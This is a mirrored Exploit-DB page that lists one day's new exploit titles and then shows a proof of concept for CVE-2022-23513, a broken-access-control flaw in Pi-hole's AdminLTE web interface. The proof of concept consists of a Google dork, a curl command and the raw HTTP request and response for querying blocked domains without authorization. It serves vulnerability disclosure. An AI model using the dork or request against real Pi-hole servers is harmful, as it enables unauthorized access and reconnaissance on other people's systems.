bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51705.txt
Exploit-DB 4e246a01fb DB: 2023-09-05 
18 changes to exploits/shellcodes/ghdb

DLINK DPH-400SE - Exposure of Sensitive Information

FileMage Gateway 1.10.9 - Local File Inclusion

Academy LMS 6.1 - Arbitrary File Upload

AdminLTE PiHole 5.18 - Broken Access Control

Blood Donor Management System v1.0 - Stored XSS

Bus Reservation System 1.1 - Multiple-SQLi

Credit Lite 1.5.4 - SQL Injection
CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

Hyip Rio 2.1 - Arbitrary File Upload

Member Login Script 3.3 - Client-side desync

SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)

Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

Kingo ROOT 1.5.8 - Unquoted Service Path

NVClient v5.0 - Stack Buffer Overflow (DoS)

Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
2023-09-05 00:16:27 +00:00

28 lines
No EOL
939 B
Text
Raw Blame History

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513
In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]
## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]
data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>
Reference in a new issue View git blame Copy permalink